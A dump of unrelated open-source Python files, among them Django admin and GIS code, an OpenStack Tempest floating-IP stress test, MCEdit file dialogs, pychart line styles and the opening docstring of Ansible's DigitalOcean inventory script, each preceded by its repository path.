'back': {
'link': link({year_field: year_lookup}),
'title': str(year_lookup)
},
'choices': [{
'link': link({year_field: year_lookup, month_field: month_lookup, day_field: day.day}),
'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))
} for day in days]
}
elif year_lookup:
months = cl.queryset.filter(**{year_field: year_lookup})
months = getattr(months, dates_or_datetimes)(field_name, 'month')
return {
'show': True,
'back': {
'link': link({}),
'title': _('All dates')
},
'choices': [{
'link': link({year_field: year_lookup, month_field: month.month}),
'title': capfirst(formats.date_format(month, 'YEAR_MONTH_FORMAT'))
} for month in months]
}
else:
years = getattr(cl.queryset, dates_or_datetimes)(field_name, 'year')
return {
'show': True,
'choices': [{
'link': link({year_field: str(year.year)}),
'title': str(year.year),
} for year in years]
}
@register.inclusion_tag('admin/search_form.html')
def search_form(cl):
"""
Displays a search form for searching the list.
"""
return {
'cl': cl,
'show_result_count': cl.result_count != cl.full_result_count,
'search_var': SEARCH_VAR
}
@register.simple_tag
def admin_list_filter(cl, spec):
tpl = get_template(spec.template)
return tpl.render({
'title': spec.title,
'choices': list(spec.choices(cl)),
'spec': spec,
})
@register.inclusion_tag('admin/actions.html', takes_context=True)
def admin_actions(context):
"""
Track the number of times the action field has been rendered on the page,
so we know which value to use.
"""
context['action_index'] = context.get('action_index', -1) + 1
return context
|
dracos/django
|
refs/heads/master
|
django/contrib/gis/db/backends/oracle/adapter.py
|
91
|
from cx_Oracle import CLOB
from django.contrib.gis.db.backends.base.adapter import WKTAdapter
from django.contrib.gis.geos import GeometryCollection, Polygon
class OracleSpatialAdapter(WKTAdapter):
input_size = CLOB
def __init__(self, geom):
"""
Oracle requires that polygon rings are in proper orientation. This
affects spatial operations and an invalid orientation may cause
failures. Correct orientations are:
* Outer ring - counter clockwise
* Inner ring(s) - clockwise
"""
if isinstance(geom, Polygon):
self._fix_polygon(geom)
elif isinstance(geom, GeometryCollection):
self._fix_geometry_collection(geom)
self.wkt = geom.wkt
self.srid = geom.srid
def _fix_polygon(self, poly):
"""Fix single polygon orientation as described in __init__()."""
if self._isClockwise(poly.exterior_ring):
poly.exterior_ring = list(reversed(poly.exterior_ring))
for i in range(1, len(poly)):
if not self._isClockwise(poly[i]):
poly[i] = list(reversed(poly[i]))
return poly
def _fix_geometry_collection(self, coll):
"""
Fix polygon orientations in geometry collections as described in
__init__().
"""
for i, geom in enumerate(coll):
if isinstance(geom, Polygon):
coll[i] = self._fix_polygon(geom)
def _isClockwise(self, coords):
"""
A modified shoelace algorithm to determine polygon orientation.
See https://en.wikipedia.org/wiki/Shoelace_formula.
"""
n = len(coords)
area = 0.0
for i in range(n):
j = (i + 1) % n
area += coords[i][0] * coords[j][1]
area -= coords[j][0] * coords[i][1]
return area < 0.0
|
ghandiosm/Test
|
refs/heads/master
|
addons/hr_timesheet_sheet/report/__init__.py
|
46
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import hr_timesheet_report
|
pwong-mapr/private-hue
|
refs/heads/HUE-1096-abe
|
desktop/core/ext-py/Django-1.4.5/tests/regressiontests/urlpatterns_reverse/middleware.py
|
92
|
from __future__ import absolute_import
from . import urlconf_inner
class ChangeURLconfMiddleware(object):
def process_request(self, request):
request.urlconf = urlconf_inner.__name__
class NullChangeURLconfMiddleware(object):
def process_request(self, request):
request.urlconf = None
|
danielmellado/tempest
|
refs/heads/master
|
tempest/stress/actions/ssh_floating.py
|
6
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socket
import subprocess
from tempest_lib.common.utils import data_utils
from tempest import config
import tempest.stress.stressaction as stressaction
import tempest.test
CONF = config.CONF
class FloatingStress(stressaction.StressAction):
# from the scenario manager
def ping_ip_address(self, ip_address):
cmd = ['ping', '-c1', '-w1', ip_address]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
success = proc.returncode == 0
return success
def tcp_connect_scan(self, addr, port):
# like tcp
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((addr, port))
except socket.error as exc:
self.logger.info("%s(%s): %s", self.server_id, self.floating['ip'],
str(exc))
return False
self.logger.info("%s(%s): Connected :)", self.server_id,
self.floating['ip'])
s.close()
return True
def check_port_ssh(self):
def func():
return self.tcp_connect_scan(self.floating['ip'], 22)
if not tempest.test.call_until_true(func, self.check_timeout,
self.check_interval):
raise RuntimeError("Cannot connect to the ssh port.")
def check_icmp_echo(self):
self.logger.info("%s(%s): Pinging..",
self.server_id, self.floating['ip'])
def func():
return self.ping_ip_address(self.floating['ip'])
if not tempest.test.call_until_true(func, self.check_timeout,
self.check_interval):
raise RuntimeError("%s(%s): Cannot ping the machine.",
self.server_id, self.floating['ip'])
self.logger.info("%s(%s): pong :)",
self.server_id, self.floating['ip'])
def _create_vm(self):
self.name = name = data_utils.rand_name("instance")
servers_client = self.manager.servers_client
self.logger.info("creating %s" % name)
vm_args = self.vm_extra_args.copy()
vm_args['security_groups'] = [self.sec_grp]
server = servers_client.create_server(name, self.image,
self.flavor,
**vm_args)
self.server_id = server['id']
if self.wait_after_vm_create:
self.manager.servers_client.wait_for_server_status(self.server_id,
'ACTIVE')
def _destroy_vm(self):
self.logger.info("deleting %s" % self.server_id)
self.manager.servers_client.delete_server(self.server_id)
self.manager.servers_client.wait_for_server_termination(self.server_id)
self.logger.info("deleted %s" % self.server_id)
def _create_sec_group(self):
sec_grp_cli = self.manager.security_groups_client
s_name = data_utils.rand_name('sec_grp-')
s_description = data_utils.rand_name('desc-')
self.sec_grp = sec_grp_cli.create_security_group(s_name,
s_description)
create_rule = sec_grp_cli.create_security_group_rule
create_rule(self.sec_grp['id'], 'tcp', 22, 22)
create_rule(self.sec_grp['id'], 'icmp', -1, -1)
def _destroy_sec_grp(self):
sec_grp_cli = self.manager.security_groups_client
sec_grp_cli.delete_security_group(self.sec_grp['id'])
def _create_floating_ip(self):
floating_cli = self.manager.floating_ips_client
self.floating = floating_cli.create_floating_ip(self.floating_pool)
def _destroy_floating_ip(self):
cli = self.manager.floating_ips_client
cli.delete_floating_ip(self.floating['id'])
cli.wait_for_resource_deletion(self.floating['id'])
self.logger.info("Deleted Floating IP %s", str(self.floating['ip']))
def setUp(self, **kwargs):
self.image = CONF.compute.image_ref
self.flavor = CONF.compute.flavor_ref
self.vm_extra_args = kwargs.get('vm_extra_args', {})
self.wait_after_vm_create = kwargs.get('wait_after_vm_create',
True)
self.new_vm = kwargs.get('new_vm', False)
self.new_sec_grp = kwargs.get('new_sec_group', False)
self.new_floating = kwargs.get('new_floating', False)
self.reboot = kwargs.get('reboot', False)
self.floating_pool = kwargs.get('floating_pool', None)
self.verify = kwargs.get('verify', ('check_port_ssh',
'check_icmp_echo'))
self.check_timeout = kwargs.get('check_timeout', 120)
self.check_interval = kwargs.get('check_interval', 1)
self.wait_for_disassociate = kwargs.get('wait_for_disassociate',
True)
# allocate floating
if not self.new_floating:
self._create_floating_ip()
# add security group
if not self.new_sec_grp:
self._create_sec_group()
# create vm
if not self.new_vm:
self._create_vm()
def wait_disassociate(self):
cli = self.manager.floating_ips_client
def func():
floating = cli.get_floating_ip_details(self.floating['id'])
return floating['instance_id'] is None
if not tempest.test.call_until_true(func, self.check_timeout,
self.check_interval):
raise RuntimeError("IP disassociate timeout!")
def run_core(self):
cli = self.manager.floating_ips_client
cli.associate_floating_ip_to_server(self.floating['ip'],
self.server_id)
for method in self.verify:
m = getattr(self, method)
m()
cli.disassociate_floating_ip_from_server(self.floating['ip'],
self.server_id)
if self.wait_for_disassociate:
self.wait_disassociate()
def run(self):
if self.new_sec_grp:
self._create_sec_group()
if self.new_floating:
self._create_floating_ip()
if self.new_vm:
self._create_vm()
if self.reboot:
self.manager.servers_client.reboot(self.server_id, 'HARD')
self.manager.servers_client.wait_for_server_status(self.server_id,
'ACTIVE')
self.run_core()
if self.new_vm:
self._destroy_vm()
if self.new_floating:
self._destroy_floating_ip()
if self.new_sec_grp:
self._destroy_sec_grp()
def tearDown(self):
if not self.new_vm:
self._destroy_vm()
if not self.new_floating:
self._destroy_floating_ip()
if not self.new_sec_grp:
self._destroy_sec_grp()
|
VariationalResearch/Polaron
|
refs/heads/master
|
polrabi/wf2.py
|
1
|
from . basic import *
# NOTE: FORGOT TO MULTIPLY BY dk IN INTEGRALS FOR SECONDWF CALCULATIONS
# ALSO, WK**-1 IS WRONG APPARENTLY -> NEED TO DO 1/WK
def pchi(betaVec, kVec, gBB, mB, n0):
# takes finite vector of Beta_{k} values and returns (1/2)*Sum_{k}[W_{k}*(Beta_{k}+Beta_{k}^{*})]
betaSum = betaVec + np.conjugate(betaVec)
return (1 / 2) * (4 * np.pi / (2 * np.pi)**3) * np.dot(Wk(kVec, gBB, mB, n0), betaSum * kVec**2)
def mchi(betaVec, kVec, gBB, mB, n0):
# takes finite vector of Beta_{k} values and returns (1/2)*Sum_{k}[W_{k}^{-1}*(Beta_{k}-Beta_{k}^{*})]
betaDiff = betaVec - np.conjugate(betaVec)
return (1 / 2) * (4 * np.pi / (2 * np.pi)**3) * np.dot(Wk(kVec, gBB, mB, n0)**(-1), betaDiff * kVec**2)
# def omega_k(P, PB, k, gBB, mI, mB, n0):
# return w(k, gBB, mB, n0) + (k**2 / (2 * mI)) - (k / mI) * (P - PB)
def omega0_k(k, gBB, mI, mB, n0):
return w(k, gBB, mB, n0) + (k**2 / (2 * mI))
def g(aIBi, kcutoff, gBB, mI, mB, n0):
# assuming finite vector of k values, gives interaction strength constant
# divSum = (4 * np.pi / (2 * np.pi)**3) * sum((kVec**2) * (Wk(kVec, gBB, mB, n0)**2) / omega_k(P, PB, kVec, gBB, mI, mB, n0))
return 1 / ((ur(mI, mB) / (2 * np.pi)) * aIBi - (ur(mI, mB) / np.pi**2) * kcutoff)
|
gpmidi/MCEdit-Unified
|
refs/heads/master
|
albow/file_dialogs.py
|
3
|
# -*- coding: utf-8 -*-
#
# Albow - File Dialogs
#
#-# Modified by D.C.-G. for translation purpose
"""
TODO:
* Implement Windows support.
"""
import os, sys
from pygame import event, image
from pygame.transform import scale
from pygame.locals import *
from albow.widget import Widget
from albow.dialogs import Dialog, ask, alert
from albow.controls import Label, Button, Image
from albow.fields import TextFieldWrapped
from albow.layout import Row, Column
from albow.palette_view import PaletteView
from albow.scrollpanel import ScrollPanel
from albow.theme import ThemeProperty
from translate import _
from tree import Tree
import logging
log = logging.getLogger(__name__)
if sys.platform in ('darwin', 'linux2'):
print "*** MCEDIT DEBUG: file_dialog:", __file__
print "*** MCEDIT DEBUG: directory:", os.path.dirname(__file__)
print "*** MCEDIT DEBUG: current directory:", os.getcwd()
try:
file_image = image.load('file.png')
folder_image = image.load('folder.png')
except Exception, e:
print "MCEDIT DEBUG: Could not load file dialog images."
print e
from pygame import draw, Surface
from pygame.locals import SRCALPHA
from math import pi
file_image = Surface((16, 16), SRCALPHA)
file_image.fill((0,0,0,0))
draw.lines(file_image, (255, 255, 255, 255), False, [[3, 15], [3, 1], [13, 1]], 2)
draw.line(file_image, (255, 255, 255, 255), [3, 7], [10, 7], 2)
folder_image = Surface((16, 16), SRCALPHA)
folder_image.fill((0,0,0,0))
draw.line(folder_image, (255, 255, 255, 255), [3, 15], [3, 1], 2)
draw.arc(folder_image, (255, 255, 255, 255), [0, 1, 13, 15], 0, pi/1.9, 2)
draw.arc(folder_image, (255, 255, 255, 255), [0, 1, 13, 15], 3*pi/2, 2*pi, 2)
else: # windows
file_image = image.load('file.png')
folder_image = image.load('folder.png')
class DirPathView(Widget):
def __init__(self, width, client, **kwds):
Widget.__init__(self, **kwds)
self.set_size_for_text(width)
self.client = client
def draw(self, surf):
frame = self.get_margin_rect()
image = self.font.render(self.client.directory, True, self.fg_color)
tw = image.get_width()
mw = frame.width
if tw <= mw:
x = 0
else:
x = mw - tw
surf.blit(image, (frame.left + x, frame.top))
class FileListView(ScrollPanel):
def __init__(self, width, client, **kwds):
font = self.predict_font(kwds)
h = font.get_linesize()
d = 2 * self.predict(kwds, 'margin')
kwds['align'] = kwds.get('align', 'l')
ScrollPanel.__init__(self, inner_width=width, **kwds)
self.icons = {True: scale(folder_image, (self.row_height, self.row_height)), False: scale(file_image, (self.row_height, self.row_height))}
self.client = client
self.names = []
def update(self):
client = self.client
dir = client.directory
def filter(name):
path = os.path.join(dir, name)
return os.path.isdir(path) or self.client.filter(path)
try:
content = os.walk(dir)
for a, dirnames, filenames in content:
dirnames.sort()
filenames.sort()
break
try:
self.names = [unicode(name, 'utf-8') for name in dirnames + filenames if filter(name)]
except:
self.names = [name for name in dirnames + filenames if filter(name)]
except EnvironmentError, e:
alert(u"%s: %s" % (dir, e))
self.names = []
self.rows = [Row([Image(self.icons[os.path.isdir(os.path.join(dir, a))]),
Label(a, margin=0)], margin=0, spacing=2) for a in self.names]
self.selected_item_index = None
self.scroll_to_item(0)
def scroll_to_item(self, *args, **kwargs):
self.scrollRow.scroll_to_item(*args, **kwargs)
def num_items(self):
return len(self.names)
def click_item(self, item_no, e):
self.selected_item_index = item_no
ScrollPanel.click_item(self, item_no, e)
if e.num_clicks == 2:
self.client.dir_box_click(True)
def item_is_selected(self, item_no):
return item_no == self.selected_item_index
def get_selected_name(self):
sel = self.selected_item_index
if sel is not None:
return self.names[sel]
else:
return ""
def get_platform_root_dir():
#-# Rework this in order to mimic the OSs file chooser behaviour.
#-# Need platform/version specific code...
return '/'
class FSTree(Tree):
def __init__(self, client, *args, **kwargs):
kwargs['draw_zebra'] = False
self.client = client
self.directory = get_platform_root_dir()
self.content = content = os.walk(self.directory)
if client is not None and hasattr(client, 'directory'):
self.directory = client.directory
self.directory = kwargs.pop('directory', self.directory)
self.data = data = {}
d = {}
for dirpath, dirnames, filenames in content:
for name in dirnames:
d[name] = self.parse_path(name, os.path.join(dirpath, name))
data[dirpath] = d
break
kwargs['data'] = data
Tree.__init__(self, *args, **kwargs)
del self.menu
self.set_directory(self.directory)
def show_menu(self, *args, **kwargs):
return
def set_directory(self, directory):
self.diretory = directory
self.deployed = []
splitted_path = directory.split(os.sep)
while '' in splitted_path:
splitted_path.remove('')
splitted_path.insert(0, '/')
d = self.data
path = ""
while splitted_path:
name = splitted_path.pop(0)
path = os.path.join(path, name)
d[name] = self.parse_path(name, path)
rows = self.build_layout()
i = 0
for row in rows:
if row[3] == name and self.get_item_path(row) in directory:
self.deployed.append(row[6])
self.clicked_item = row
rows[i + 1:] = self.build_layout()[i + 1:]
if directory == self.get_item_path(row):
self.treeRow.scroll_to_item(rows.index(row))
self.selected_item_index = rows.index(row)
self.selected_item = row
break
i += 1
d = d[name]
def parse_path(self, name, path):
#!# The log.debug() and print stuff in there are intended to fix some OSX issues.
#!# Please do not strip them out. -- D.C.-G.
# log.debug('FSTree.parse_path')
# log.debug(' path: %s\n length: %d'%(repr(path), len(path)))
# print ' path: %s\n length: %d'%(repr(path), len(path))
# log.debug(' path: %s\n length: %d'%(repr(path), len(path)))
# if len(path) < 1: print ' ! ! ! ^ ^ ^ ! ! !'
# if len(path) < 1: log.debug(' ! ! ! ^ ^ ^ ! ! !')
content = os.walk(path)
data = {}
d = data
for a, folders, b in content:
# log.debug(' a: %s\n length: %d'%(repr(a), len(a)))
# print ' a: %s\n length: %d'%(repr(a), len(a))
# log.debug(' a: %s\n length: %d'%(repr(a), len(a)))
# if len(a) < 1: print ' ! ! ! ^ ^ ^ ! ! !'
# if len(a) < 1: log.debug(' ! ! ! ^ ^ ^ ! ! !')
d = {}
for folder in folders:
# log.debug(' folder: %s\n length: %d'%(repr(folder), len(folder)))
# print ' folder: %s\n length: %d'%(repr(folder), len(folder))
# log.debug(' folder: %s\n length: %d'%(repr(folder), len(folder)))
# if len(folder) < 1: print ' ! ! ! ^ ^ ^ ! ! !'
# if len(folder) < 1: log.debug(' ! ! ! ^ ^ ^ ! ! !')
if type(folder) == str:
folder = unicode(folder, 'utf-8')
d[folder] = {}
if type(a) == str:
a = unicode(a,'utf-8')
cont = os.walk(os.path.join(a, folder))
for _a, fs, _b in cont:
for f in fs:
# log.debug(' f: %s\n length: %d'%(repr(f), len(f)))
# print ' f: %s\n length: %d'%(repr(f), len(f))
# log.debug(' f: %s\n length: %d'%(repr(f), len(f)))
# if len(f) < 1: print ' ! ! ! ^ ^ ^ ! ! !'
# if len(f) < 1: log.debug(' ! ! ! ^ ^ ^ ! ! !')
if type(f) == str:
d[folder][unicode(f, 'utf-8')] = {}
else:
d[folder][f] = {}
break
break
return d
def get_item_path(self, item):
path_list = []
if item is not None:
id = item[6]
parents = [item]
while id != 1:
item = self.get_item_parent(parents[-1])
if item is None:
break
id = item[6]
parents.append(item)
parents.reverse()
path_list = [a[3] for a in parents]
path = '/'
for name in path_list:
path = os.path.join(path, name)
return path
def deploy(self, id):
path = self.get_item_path(self.clicked_item)
self.clicked_item[9] = self.parse_path(self.clicked_item[3], path)
Tree.deploy(self, id)
def select_item(self, n):
Tree.select_item(self, n)
self.client.directory = self.get_item_path(self.selected_item)
class FileDialog(Dialog):
box_width = 450
default_prompt = None
up_button_text = ThemeProperty("up_button_text")
def __init__(self, prompt=None, suffixes=None, **kwds):
Dialog.__init__(self, **kwds)
label = None
d = self.margin
self.suffixes = suffixes or ("",)
up_button = Button(self.up_button_text, action=self.go_up)
dir_box = DirPathView(self.box_width + 250, self)
self.dir_box = dir_box
top_row = Row([dir_box, up_button])
list_box = FileListView(self.box_width - 16, self)
self.list_box = list_box
tree = FSTree(self, inner_width=250, directory='/')
self.tree = tree
row = Row((tree, list_box), margin=0)
ctrls = [top_row, row]
prompt = prompt or self.default_prompt
if prompt:
label = Label(prompt)
if self.saving:
filename_box = TextFieldWrapped(self.box_width)
filename_box.change_action = self.update_filename
filename_box._enter_action = filename_box.enter_action
filename_box.enter_action = self.enter_action
self.filename_box = filename_box
ctrls.append(Column([label, filename_box], align='l', spacing=0))
else:
if label:
ctrls.insert(0, label)
ok_button = Button(self.ok_label, action=self.ok, enable=self.ok_enable)
self.ok_button = ok_button
cancel_button = Button("Cancel", action=self.cancel)
vbox = Column(ctrls, align='l', spacing=d)
vbox.topleft = (d, d)
y = vbox.bottom + d
ok_button.topleft = (vbox.left, y)
cancel_button.topright = (vbox.right, y)
self.add(vbox)
self.add(ok_button)
self.add(cancel_button)
self.shrink_wrap()
self._directory = None
self.directory = os.getcwdu()
#print "FileDialog: cwd =", repr(self.directory) ###
if self.saving:
filename_box.focus()
def get_directory(self):
return self._directory
def set_directory(self, x):
x = os.path.abspath(x)
while not os.path.exists(x):
y = os.path.dirname(x)
if y == x:
x = os.getcwdu()
break
x = y
if self._directory != x:
self._directory = x
self.list_box.update()
self.update()
directory = property(get_directory, set_directory)
def filter(self, path):
suffixes = self.suffixes
if not suffixes or os.path.isdir(path):
#return os.path.isfile(path)
return True
for suffix in suffixes:
if path.endswith(suffix.lower()):
return True
def update(self):
self.tree.set_directory(self.directory)
def update_filename(self):
if self.filename_box.text in self.list_box.names:
self.directory = os.path.join(self.directory, self.filename_box.text)
def go_up(self):
self.directory = os.path.dirname(self.directory)
self.list_box.scroll_to_item(0)
def dir_box_click(self, double):
if double:
name = self.list_box.get_selected_name()
path = os.path.join(self.directory, name)
suffix = os.path.splitext(name)[1]
if suffix not in self.suffixes and os.path.isdir(path):
self.directory = path
else:
self.double_click_file(name)
self.update()
def enter_action(self):
self.filename_box._enter_action()
self.ok()
def ok(self):
self.dir_box_click(True)
#self.dismiss(True)
def cancel(self):
self.dismiss(False)
def key_down(self, evt):
k = evt.key
if k == K_RETURN or k == K_KP_ENTER:
self.dir_box_click(True)
if k == K_ESCAPE:
self.cancel()
class FileSaveDialog(FileDialog):
saving = True
default_prompt = "Save as:"
ok_label = "Save"
def get_filename(self):
return self.filename_box.text
def set_filename(self, x):
dsuf = self.suffixes[0]
if dsuf and x.endswith(dsuf):
x = x[:-len(dsuf)]
self.filename_box.text = x
filename = property(get_filename, set_filename)
def get_pathname(self):
path = os.path.join(self.directory, self.filename_box.text)
suffixes = self.suffixes
if suffixes and not path.endswith(suffixes[0]):
path = path + suffixes[0]
return path
pathname = property(get_pathname)
def double_click_file(self, name):
self.filename_box.text = name
def ok(self):
path = self.pathname
if os.path.exists(path):
answer = ask(_("Replace existing '%s'?") % os.path.basename(path))
if answer != "OK":
return
#FileDialog.ok(self)
self.dismiss(True)
def update(self):
FileDialog.update(self)
def ok_enable(self):
return self.filename_box.text != ""
class FileOpenDialog(FileDialog):
saving = False
ok_label = "Open"
def get_pathname(self):
name = self.list_box.get_selected_name()
if name:
return os.path.join(self.directory, name)
else:
return None
pathname = property(get_pathname)
#def update(self):
# FileDialog.update(self)
def ok_enable(self):
path = self.pathname
enabled = self.item_is_choosable(path)
return enabled
def item_is_choosable(self, path):
return bool(path) and self.filter(path)
def double_click_file(self, name):
self.dismiss(True)
class LookForFileDialog(FileOpenDialog):
target = None
def __init__(self, target, **kwds):
FileOpenDialog.__init__(self, **kwds)
self.target = target
def item_is_choosable(self, path):
return path and os.path.basename(path) == self.target
def filter(self, name):
return name and os.path.basename(name) == self.target
def request_new_filename(prompt=None, suffix=None, extra_suffixes=None,
directory=None, filename=None, pathname=None):
if pathname:
directory, filename = os.path.split(pathname)
if extra_suffixes:
suffixes = extra_suffixes
else:
suffixes = []
if suffix:
suffixes = [suffix] + suffixes
dlog = FileSaveDialog(prompt=prompt, suffixes=suffixes)
if directory:
dlog.directory = directory
if filename:
dlog.filename = filename
if dlog.present():
return dlog.pathname
else:
return None
def request_old_filename(suffixes=None, directory=None):
dlog = FileOpenDialog(suffixes=suffixes)
if directory:
dlog.directory = directory
if dlog.present():
return dlog.pathname
else:
return None
def look_for_file_or_directory(target, prompt=None, directory=None):
dlog = LookForFileDialog(target=target, prompt=prompt)
if directory:
dlog.directory = directory
if dlog.present():
return dlog.pathname
else:
return None
|
Johnzero/erp
|
refs/heads/fga
|
openerp/pychart/line_style.py
|
15
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2000-2005 by Yasushi Saito (yasushi.saito@gmail.com)
#
# Jockey is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2, or (at your option) any
# later version.
#
# Jockey is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
import color
import pychart_util
import chart_object
import object_set
import theme
import line_style_doc
from pychart_types import *
from types import *
_keys = {
"width" : (UnitType, theme.default_line_width, "Width of the line, in points."),
"color": (color.T, color.default, "The color of the line."),
"dash" : (TupleType, None,
"""The value
of None will draw a solid line. Otherwise, this
attribute specifies the style of dashed lines.
The 2N'th value specifies the length of the line (in points),
and 2N+1'th value specifies the length of the blank.
For example, the dash style of (3,2,4,1) draws a dashed line that
looks like @samp{---__----_---__----_...}.
"""),
"cap_style": (IntType, 0,
"""Defines the style of the tip of the line segment.
0: butt cap (square cutoff, with no projection beyond),
1: round cap (arc), 2: projecting square cap
(square cutoff, but the line extends half the line width).
See also Postscript/PDF reference manual."""),
"join_style": (IntType, 0,
"""Join style. 0: Miter join (sharp, pointed corners),
1: round join (rounded corners),
2: bevel join (flattened corners).
See also Postscript/PDF reference manual.""")
}
class T(chart_object.T):
__doc__ = line_style_doc.doc
keys = _keys
##AUTOMATICALLY GENERATED
##END AUTOMATICALLY GENERATED
def __str__(self):
s = name_table().lookup(self)
if s:
return s
return "<linestyle: width=%s, color=%s, dash=%s, cap=%d, join=%d>" \
% (self.width, self.color, self.dash, self.cap_style, self.join_style)
default = T(color=color.default)
dash1 = 1.5,1.5 # - - - -
dash2 = 5,2,5,2 # -- -- -- --
dash3 = 1,1
black = T(color=color.black)
black_dash1 = T(color=color.black, dash=dash1)
black_dash2 = T(color=color.black, dash=dash2)
black_dash3 = T(color=color.black, dash=dash3)
gray70 = T(color=color.gray70)
gray70_dash1 = T(color=color.gray70, dash=dash1)
gray70_dash2 = T(color=color.gray70, dash=dash2)
gray70_dash3 = T(color=color.gray70, dash=dash3)
gray10 = T(color=color.gray10)
gray10_dash1 = T(color=color.gray10, dash=dash1)
gray10_dash2 = T(color=color.gray10, dash=dash2)
gray10_dash3 = T(color=color.gray10, dash=dash3)
gray50 = T(color=color.gray50)
gray50_dash1 = T(color=color.gray50, dash=dash1)
gray50_dash2 = T(color=color.gray50, dash=dash2)
gray50_dash3 = T(color=color.gray50, dash=dash3)
gray60 = T(color=color.gray60)
gray60_dash1 = T(color=color.gray60, dash=dash1)
gray60_dash2 = T(color=color.gray60, dash=dash2)
gray60_dash3 = T(color=color.gray60, dash=dash3)
gray90 = T(color=color.gray90)
gray90_dash1 = T(color=color.gray90, dash=dash1)
gray90_dash2 = T(color=color.gray90, dash=dash2)
gray90_dash3 = T(color=color.gray90, dash=dash3)
gray30 = T(color=color.gray30)
gray30_dash1 = T(color=color.gray30, dash=dash1)
gray30_dash2 = T(color=color.gray30, dash=dash2)
gray30_dash3 = T(color=color.gray30, dash=dash3)
white = T(color=color.white)
default = black
red = T(color=color.red)
darkblue = T(color=color.darkblue)
darkseagreen = T(color=color.darkseagreen)
darkkhaki = T(color = color.darkkhaki)
blue = T(color=color.blue)
green = T(color=color.green)
red_dash1 = T(color=color.red, dash=dash1)
darkblue_dash1 = T(color=color.darkblue, dash=dash1)
darkseagreen_dash1 = T(color=color.darkseagreen, dash=dash1)
darkkhaki_dash1 = T(color=color.darkkhaki, dash=dash1)
red_dash2 = T(color=color.red, dash=dash2)
darkblue_dash2 = T(color=color.darkblue, dash=dash2)
darkseagreen_dash2 = T(color=color.darkseagreen, dash=dash2)
darkkhaki_dash2 = T(color=color.darkkhaki, dash=dash2)
standards = None
_name_table = None
def init():
global standards, _name_table
standards = object_set.T()
if theme.use_color:
standards.add(black, red, darkblue, gray70, darkseagreen,
darkkhaki, gray30,
black_dash1, red_dash1, darkblue_dash1, gray70_dash1,
darkseagreen_dash1, darkkhaki_dash1, gray30_dash1,
black_dash2, red_dash2, darkblue_dash2, gray70_dash2,
darkseagreen_dash2, darkkhaki_dash2, gray30_dash2)
else:
standards.add(black, black_dash1, black_dash2,
gray70, gray70_dash1, gray70_dash2,
gray10, gray10_dash1, gray10_dash2,
gray50, gray50_dash1, gray50_dash2,
gray90, gray90_dash1, gray90_dash2,
gray30, gray30_dash1, gray30_dash2,
black_dash3,
gray70_dash3, gray10_dash3, gray50_dash3, gray90_dash3)
for style in standards.list():
style.width = theme.default_line_width
_name_table = None
def name_table():
global _name_table
if not _name_table:
_name_table = pychart_util.symbol_lookup_table(globals(), standards)
return _name_table
init()
theme.add_reinitialization_hook(init)
|
maxalbert/ansible
|
refs/heads/devel
|
contrib/inventory/digital_ocean.py
|
33
|
#!/usr/bin/env python
'''
DigitalOcean external inventory script
======================================
Generates Ansible inventory of DigitalOcean Droplets.
In addition to the --list and --host options used by Ansible, there are options
for generating JSON of other DigitalOcean data. This is useful when creating
droplets. For example, --regions will return all the DigitalOcean Regions.
This information can also be easily found in the cache file, whose default
location is /tmp/ansible-digital_ocean.cache).
The --pretty (-p) option pretty-prints the output for better human readability.
----
Although the cache stores all the information received from DigitalOcean,
the cache is not used for current droplet information (in --list, --host,
--all, and --droplets). This is so that accurate droplet information is always
found. You can force this script to use the cache with --force-cache.
----
Configuration is read from `digital_ocean.ini`, then from environment variables,
then and command-line arguments.
Most notably, the DigitalOcean API Token must be specified. It can be specified
in the INI file or with the following environment variables:
export DO_API_TOKEN='abc123' or
export DO_API_KEY='abc123'
Alternatively, it can be passed on the command-line with --api-token.
If you specify DigitalOcean credentials in the INI file, a handy way to
get them into your environment (e.g., to use the digital_ocean module)
is to use the output of the --env option with export:
export $(digital_ocean.py --env)
----
The following groups are generated from --list:
- ID (droplet ID)
- NAME (droplet NAME)
- image_ID
- image_NAME
- distro_NAME (distribution NAME from image)
- region_NAME
- size_NAME
- status_STATUS
When run against a specific host, this script returns the following variables:
- do_backup_ids
- do_created_at
- do_disk
- do_features - list
- do_id
- do_image - object
- do_ip_address
- do_private_ip_address
- do_kernel - object
- do_locked
- de_memory
- do_name
- do_networks - object
- do_next_backup_window
- do_region - object
- do_size - object
- do_size_slug
- do_snapshot_ids - list
- do_status
- do_vcpus
-----
```
usage: digital_ocean.py [-h] [--list] [--host HOST] [--all]
[--droplets] [--regions] [--images] [--sizes]
[--ssh-keys] [--domains] [--pretty]
[--cache-path CACHE_PATH]
[--cache-max_age CACHE_MAX_AGE]
[--force-cache]
[--refresh-cache]
[--api-token API_TOKEN]
Produce an Ansible Inventory file based on DigitalOcean credentials
optional arguments:
-h, --help show this help message and exit
--list List all active Droplets as Ansible inventory
(default: True)
--host HOST Get all Ansible inventory variables about a specific
Droplet
--all List all DigitalOcean information as JSON
--droplets List Droplets as JSON
--regions List Regions as JSON
--images List Images as JSON
--sizes List Sizes as JSON
--ssh-keys List SSH keys as JSON
--domains List Domains as JSON
--pretty, -p Pretty-print results
--cache-path CACHE_PATH
Path to the cache files (default: .)
--cache-max_age CACHE_MAX_AGE
Maximum age of the cached items (default: 0)
--force-cache Only use data from the cache
--refresh-cache Force refresh of cache by making API requests to
DigitalOcean (default: False - use cache files)
--api-token API_TOKEN, -a API_TOKEN
DigitalOcean API Token
```
'''
# (c) 2013, Evan Wies <evan@neomantra.net>
#
# Inspired by the EC2 inventory plugin:
# https://github.com/ansible/ansible/blob/devel/contrib/inventory/ec2.py
#
